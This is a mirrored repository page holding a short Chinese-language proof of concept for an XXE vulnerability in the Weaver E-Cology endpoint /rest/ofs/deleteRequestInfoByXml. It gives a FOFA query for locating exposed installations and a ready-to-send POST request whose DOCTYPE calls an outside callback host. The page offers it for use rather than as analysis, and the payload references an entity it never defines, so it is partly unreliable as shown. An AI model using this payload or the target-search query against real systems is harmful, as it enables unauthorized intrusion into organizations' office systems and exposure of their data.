admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 02:46:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/泛微OA/泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md

24 lines
598 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞
泛微e-cology是一款由泛微网络科技开发的协同管理平台支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology系统接口`/rest/ofs/deleteRequestInfoByXml` 存在XXE漏洞
## fofa
```java
app="泛微-协同商务系统"
```
## poc
```java
POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
Host:
Content-Type: application/xml
Content-Length: 131
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://hsdtcwwetk.dgrh3.cn">
<M><syscode>&send;</syscode></M>
```
Reference in New Issue Copy Permalink